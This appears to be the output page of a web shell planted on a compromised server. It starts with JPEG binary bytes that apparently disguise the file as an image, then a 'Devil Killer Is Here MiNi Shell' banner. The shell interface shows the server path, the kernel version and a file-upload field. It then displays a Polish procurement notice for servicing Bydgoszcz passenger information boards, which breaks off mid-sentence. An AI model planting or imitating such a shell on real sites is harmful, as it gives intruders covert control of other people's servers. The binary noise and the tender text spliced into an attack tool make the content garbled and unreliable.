JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211216/0031857601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwis Tablic Informacji Pasażerskiej dla komunikacji publicznej na terenie Miasta Bydgoszczy w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miejskich i Komunikacji Publicznej w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090476971</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 174a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-844</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 582 27 23</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 582 27 77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Budowa i utrzymanie sieci drogowej i obiektow inżynierskich, lokalny transport drogowy. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwis Tablic Informacji Pasażerskiej dla komunikacji publicznej na terenie Miasta Bydgoszczy w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9fa965b1-5e56-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00318576</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000791/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Serwis Tablic Informacji Pasażerskiej dla komunikacji publicznej na terenie Miasta Bydgoszczy w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/zdmikp_bydgoszcz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/zdmikp_bydgoszcz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i<br/>przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w<br/>sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające<br/>pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, iż po wejściu w życie, tj. po dniu 25<br/>maja 2018 r., przepisów dotyczących ochrony danych osobowych, będzie przetwarzał dane osobowe<br/>uzyskane w trakcie postępowania, a w szczególności: dane osobowe ujawnione w ofertach,<br/>dokumentach i oświadczeniach dołączonych do oferty oraz dane osobowe ujawnione w dokumentach i<br/>oświadczeniach składanych na potwierdzenie braku podstaw wykluczenia i spełnienie warunków<br/>udziału w postępowaniu. Przetwarzanie danych osobowych przez Zamawiającego jest niezbędne dla<br/>celów wynikających<br/>z prawnie uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku<br/>prawnego ciążącego na administratorze (Informacja o przetwarzaniu danych osobowych – załącznik nr<br/>10 do SWZ).<br/>Wykonawca przystępując do postępowania jest obowiązany do pisemnego poinformowania<br/>i uzyskania zgody każdej osoby, której dane osobowe będą podane w ofercie, oświadczeniach<br/>i dokumentach złożonych w postępowaniu. Na tę okoliczność Wykonawca złoży stosowne pisemne<br/>oświadczenie (jak we wzorze formularza ofertowego – załącznik nr 3 do SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">052/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa w rozumieniu art. 7 pkt 28 uPzp, polegająca<br/>na świadczeniu usług serwisowych Tablic Informacji Pasażerskiej dla komunikacji publicznej na<br/>terenie Miasta Bydgoszczy w 2022 r.<br/>Szczegółowy zakres oraz warunki wykonania zamówienia określono w załącznikach do SWZ,<br/>stanowiących jej integralną część, tj. we wzorze Umowy oraz w Opisie przedmiotu zamówienia<br/>(OPZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50334400-9 - Usługi w zakresie konserwacji systemu komunikacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert przeprowadzona zostanie w oparciu o kryteria szczegółowo<br/>opisane w punkcie XXI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji serwisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcia usterki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.:<br/>1) doświadczenia wykonawcy<br/>Wykonawca zobowiązany jest wykazać się wykonaniem (zakończeniem), a w przypadku<br/>świadczeń okresowych lub ciągłych wykonywaniem, w okresie ostatnich trzech lat, przed<br/>upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, co najmniej 1 usługi przez kolejne 3 miesiące, w zakresie dotyczącym utrzymania w<br/>stałej sprawności technicznej min. 40 urządzeń informacji pasażerskiej o działaniu i obsłudze<br/>zbliżonej do urządzeń będących przedmiotem zamówienia, np. elektroniczne urządzenia<br/>informacyjne na dworcach kolejowych, autobusowych lub lotniskach.<br/>Ogłoszenie nr 2021/BZP 00276480/01 z dnia 2021-11-19<br/>2021-11-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>W przypadku wskazania usługi wykonywanej (trwającej), należy wskazać część usługi<br/>faktycznie zrealizowanej w celu potwierdzenia spełnienia warunku.<br/>Wykonawcy wspólnie ubiegający się o zamówienie na podst. art. 58 uPzp ww. warunek<br/>spełniają następująco: przynajmniej jeden z tych wykonawców musi posiadać doświadczenie w<br/>zakresie określonym powyżej, z tym że wymóg posiadania tego doświadczenia dotyczy<br/>wykonawców zamierzających bezpośrednio realizować zamówienie.<br/>2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może<br/>polegać na potencjale podmiotu udostępniającego zasoby na zasadach opisanych w art. 118–<br/>123 uPzp. Podmiot, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia<br/>warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1<br/>oraz<br/>art. 109 ust. 1 pkt 4 uPzp.<br/>3. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby wykonawca w terminie<br/>określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał,<br/>że samodzielnie spełnia warunki udziału w postępowaniu.<br/>4. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on<br/>w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>5. W odniesieniu do warunku doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. W tym przypadku wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy.<br/>6. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie<br/>postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 Pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, czyli art. 108<br/>ust. 1 oraz 109 ust. 1 pkt 4 Pzp. Oświadczenie/a składają odpowiednio: wykonawca / każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia / podmiot trzeci, na którego potencjał<br/>powołuje się wykonawca celem potwierdzenia braku podstaw wykluczenia. (sporządzony według<br/>wzoru Zamawiającego stanowiącego załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na<br/>wezwanie Zamawiającego, zgodnie z art. 274 ust. 1 ustawy Pzp - składa wykonawca, którego oferta<br/>została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni:<br/>1) wykaz usług wykonanych, a w przypadku usług okresowych lub ciągłych również wykonywanych w<br/>okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich, przedmiotu, dat wykonania i podmiotów,<br/>na rzecz których usługi zostały wykonane lub są wykonywane (sporządzony według wzoru<br/>Zamawiającego stanowiącego załącznik nr 8 do SWZ), oraz załączeniem dowodów określających, czy<br/>te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy.<br/>Jeżeli wykonawca składa ww. oświadczenie, zobowiązany jest podać przyczyny braku możliwości<br/>uzyskania ww. dokumentów.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi<br/>wykonawcami, przedkładany wykaz musi dotyczyć usług, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>Wykaz z dowodami składa odpowiednio: wykonawca/każdy z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, który będzie bezpośrednio uczestniczył<br/>w wykonaniu usługi/ lub podmiot trzeci, na którego potencjał powołuje się wykonawca,<br/>w zakresie dotyczącym usługi, w której wykonaniu będzie on bezpośrednio uczestniczył. Podmiotowe<br/>środki dowodowe należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym, w formie pisemnej lub w formie dokumentowej, w zakresie<br/>i w sposób określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz.U.2020, poz. 2452).<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość<br/>i aktualność.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli można je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile Wykonawca wskazał w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>wynika, które usługi, wykonają poszczególni wykonawcy (jeżeli dotyczy).<br/>Wzór oświadczenia określa załącznik nr 7 do SWZ.<br/>Oświadczenie musi być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym, lub podpisem osobistym osoby<br/>upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w<br/>pełnomocnictwie, o którym mowa w pkt XII.8.2) i XII.9.2) SWZ<br/>lub dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>2. Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, określające w szczególności:<br/>a) nazwę i wskazanie siedziby podmiotu udostępniającego wykonawcy swoje zasoby,<br/>b) nazwę i wskazanie siedziby wykonawcy, któremu podmiot trzeci udostępnił swoje zasoby,<br/>c) określenie zamówienia publicznego, tj.: „Serwis Tablic Informacji Pasażerskiej dla komunikacji<br/>publicznej na terenie Miasta Bydgoszczy w 2022 r.”, Nr sprawy 052/2021,<br/>d) zakres dostępnych wykonawcy zasobów innego podmiotu, (tj. informacje, jakie konkretnie<br/>zasoby zostaną udostępnione),<br/>e) sposób wykorzystania przez wykonawcę zasobów innego podmiotu przy wykonywaniu<br/>zamówienia publicznego, (tj. informacje, w jaki sposób udostępnione zasoby będą<br/>wykorzystywane przy wykonywaniu zamówienia publicznego),<br/>f) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, (tj. informacje, na jakiej<br/>podstawie wykonawca będzie nimi dysponował),<br/>g) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,<br/>h) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału<br/>w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia<br/>(nie dotyczy sytuacji finansowej lub ekonomicznej), zrealizuje usługi, do realizacji których te<br/>zdolności są wymagane.<br/>Zobowiązanie innego podmiotu sporządza się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym, lub podpisem osobistym (osoby/osób uprawnionych do działania w imieniu<br/>podmiotu trzeciego).<br/>Zobowiązanie wraz z dowodami, że osoba podpisująca zobowiązanie, była uprawniona do<br/>działania w imieniu innego podmiotu, wykonawca dołącza do oferty jako załączniki. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia na podstawie art. 58 uPzp, (np. konsorcjum, spółka cywilna), to:<br/>1) wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego,<br/>2) wszyscy wykonawcy występujący wspólnie muszą upoważnić na piśmie pod rygorem<br/>nieważności (art.99 § 2 K.c.) ustanowionego pełnomocnika, jako przedstawiciela pozostałych, a<br/>jego upoważnienie musi być udokumentowane pełnomocnictwem przez upełnomocnionych<br/>przedstawicieli wszystkich pozostałych wykonawców i dołączone<br/>do składanej oferty,<br/>3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich 